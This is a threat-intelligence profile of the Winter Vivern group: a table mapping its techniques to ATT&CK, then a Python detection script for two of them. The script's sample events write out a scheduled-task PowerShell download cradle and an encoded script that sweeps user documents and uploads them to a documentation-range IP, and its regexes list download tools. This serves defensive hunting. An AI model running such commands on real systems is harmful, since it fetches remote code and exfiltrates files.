Winter Vivern is a group linked to Russian and Belarusian interests, active since at least 2020, that targets various European government and NGO entities, with sporadic targeting of Indian and US victims. The group combines document-based phishing and server-side exploitation for initial access, and uses adversary-controlled and adversary-created infrastructure for follow-on command and control.[1][2][3][4][5]
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1595.002 | Active Scanning: Vulnerability Scanning | Winter Vivern has used remotely-hosted instances of the Acunetix vulnerability scanner.[2] |
| Enterprise | T1036 | Masquerading | Winter Vivern created specially-crafted documents mimicking legitimate government or similar documents during phishing campaigns.[2] |
| Enterprise | T1036.004 | Masquerading: Masquerade Task or Service | Winter Vivern has distributed malicious scripts and executables mimicking virus scanners.[2] |
| Enterprise | T1190 | Exploit Public-Facing Application | Winter Vivern has exploited known and zero-day vulnerabilities in software such as Roundcube Webmail servers and the "Follina" vulnerability.[4][5] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Winter Vivern delivered exploit payloads as base64-encoded content in malicious email messages.[4] |
| Enterprise | T1059 | Command and Scripting Interpreter | Winter Vivern used Excel 4.0 (XLM) macros for initial code execution from malicious document files.[1] |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | Winter Vivern passed execution from document macros to PowerShell scripts during initial access operations.[1] Winter Vivern used batch scripts that called PowerShell commands as part of initial access and installation operations.[3] |
| Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Winter Vivern distributed Windows batch scripts disguised as virus scanners that download malicious payloads using built-in system tools.[2][3] |
| Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | Winter Vivern delivered malicious JavaScript to targets when exploiting Roundcube Webmail servers.[4] |
| Enterprise | T1584.006 | Compromise Infrastructure: Web Services | Winter Vivern has used compromised WordPress sites to host malicious payloads for download.[2] |
| Enterprise | T1113 | Screen Capture | Winter Vivern delivered PowerShell scripts capable of taking screenshots of victim machines.[3] |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Winter Vivern uses HTTP and HTTPS for exfiltration and command and control activity.[2][3] |
| Enterprise | T1083 | File and Directory Discovery | Winter Vivern delivered malicious JavaScript payloads capable of listing folders and emails on exploited email servers.[4] |
| Enterprise | T1189 | Drive-by Compromise | Winter Vivern created dedicated web pages mimicking legitimate government websites to deliver malicious fake anti-virus software.[3] |
| Enterprise | T1204.001 | User Execution: Malicious Link | Winter Vivern has mimicked legitimate government-related domains to deliver malicious webpages containing links to documents or other content for user execution.[2][3] |
| Enterprise | T1114.001 | Email Collection: Local Email Collection | Winter Vivern delivered malicious JavaScript payloads capable of exfiltrating email messages from exploited email servers.[4] |
| Enterprise | T1082 | System Information Discovery | Winter Vivern script execution includes basic victim information gathering steps whose results are then transmitted to command and control servers.[1] |
| Enterprise | T1033 | System Owner/User Discovery | Winter Vivern PowerShell scripts execute |
| Enterprise | T1119 | Automated Collection | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines for various file types before exfiltrating the identified files via HTTP.[3] |
| Enterprise | T1020 | Automated Exfiltration | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines for various file types before exfiltrating the identified files via HTTP.[3] |
| Enterprise | T1583.001 | Acquire Infrastructure: Domains | Winter Vivern registered domains mimicking other entities throughout various campaigns.[1] |
| Enterprise | T1583.003 | Acquire Infrastructure: Virtual Private Server | Winter Vivern used adversary-owned and -controlled servers to host web vulnerability scanning applications.[2] |
| Enterprise | T1105 | Ingress Tool Transfer | Winter Vivern executed PowerShell scripts that created scheduled tasks to retrieve remotely-hosted payloads.[1] |
| Enterprise | T1056.003 | Input Capture: Web Portal Capture | Winter Vivern registered and hosted domains in order to create web pages mimicking legitimate government email logon sites and collect logon credentials.[2] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines for various file types before exfiltrating the identified files via HTTP.[3] |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Winter Vivern leverages malicious attachments delivered via email for initial access.[1][2][3] |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | Winter Vivern executed PowerShell scripts that subsequently attempted to establish persistence by creating scheduled task objects to periodically retrieve and execute remotely-hosted payloads.[1] |
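Two of the behaviours in the table are straightforward to hunt for in process-creation telemetry: a scheduled task whose action is a PowerShell download cradle (T1053.005 with T1105), and a PowerShell command that recursively sweeps for document file types and then uploads them over HTTP (T1119, T1020, T1041). The Python below is an added example written for this page; it is not code from MITRE, from the cited reports, or from Winter Vivern tooling. The event records, hostnames, the 198.51.100.10 address and the tag names are constructed for illustration, and the regular expressions are assumptions about common PowerShell and schtasks syntax rather than signatures taken from the reporting. Because the group's scripts may arrive wrapped in `-EncodedCommand`, the example decodes that base64/UTF-16LE wrapper before matching.

```python
import base64
import re

# Assumed patterns for the two behaviours (not signatures from the cited reports).
TASK_CREATE = re.compile(
    r"(schtasks(\.exe)?\s+/create|register-scheduledtask|new-scheduledtask)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"start-bitstransfer|net\.webclient|bitsadmin\s+/transfer|certutil\S*\s+-urlcache)", re.I)
RECURSIVE_SWEEP = re.compile(r"(get-childitem|\bgci\b|\bdir\b|\bls\b)[^|]*-recurse", re.I)
DOC_EXTENSIONS = re.compile(r"\*\.(docx?|xlsx?|pptx?|pdf|rtf|txt)\b", re.I)
HTTP_UPLOAD = re.compile(r"(uploadfile|uploaddata|uploadstring|-method\s+post|-infile\s)", re.I)
# powershell -e / -enc / -EncodedCommand followed by a base64 blob
ENCODED_CMD = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if there is none / it is invalid."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> list:
    """Return the behaviour tags that fire on one process-creation event (empty if none)."""
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if decoded:
        cmd = cmd + " " + decoded  # match against the wrapper and the decoded script together
    tags = []
    if TASK_CREATE.search(cmd) and DOWNLOAD_CRADLE.search(cmd):
        tags.append("scheduled-task-download")  # T1053.005 + T1105
    if RECURSIVE_SWEEP.search(cmd) and DOC_EXTENSIONS.search(cmd) and HTTP_UPLOAD.search(cmd):
        tags.append("recursive-sweep-upload")  # T1119 + T1020 / T1041
    return tags


def hunt(events: list) -> list:
    """Run classify() over normalised process-creation events; return (host, tags) for hits."""
    hits = []
    for event in events:
        tags = classify(event)
        if tags:
            hits.append((event["Computer"], tags))
    return hits


# Constructed sample script and events (not real telemetry). 198.51.100.10 is a documentation address.
EXFIL_SCRIPT = (
    "Get-ChildItem -Path C:\\Users -Recurse -Include *.docx,*.xlsx,*.pdf | "
    "ForEach-Object { (New-Object Net.WebClient).UploadFile('http://198.51.100.10/up', $_.FullName) }"
)

SAMPLE_EVENTS = [
    {"Computer": "WS-01", "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /sc minute /mo 30 /tn "Updater" /tr '
                    '"powershell -w hidden -c IEX (New-Object Net.WebClient)'
                    ".DownloadString('http://198.51.100.10/a.ps1')\""},
    {"Computer": "WS-02", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -EncodedCommand " + encode_powershell(EXFIL_SCRIPT)},
    # Benign: a scheduled task without a download cradle.
    {"Computer": "WS-03", "Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": 'schtasks /create /sc daily /tn "Backup" /tr "robocopy C:\\data D:\\backup /MIR"'},
    # Benign: a recursive listing with no upload.
    {"Computer": "WS-04", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\logs -Recurse -Include *.txt | Measure-Object"},
]

if __name__ == "__main__":
    for host, tags in hunt(SAMPLE_EVENTS):
        print(host, tags)
```

The benign records show why each tag requires two or three patterns to co-occur: scheduled-task creation and recursive directory listings are routine on their own, and only the combination with a download cradle or an HTTP upload resembles the tradecraft reported here. In production the same logic would run over Sysmon Event ID 1 or Windows 4688 records with command-line auditing enabled, and the decoded `-EncodedCommand` text should be retained alongside the raw command line for analyst review.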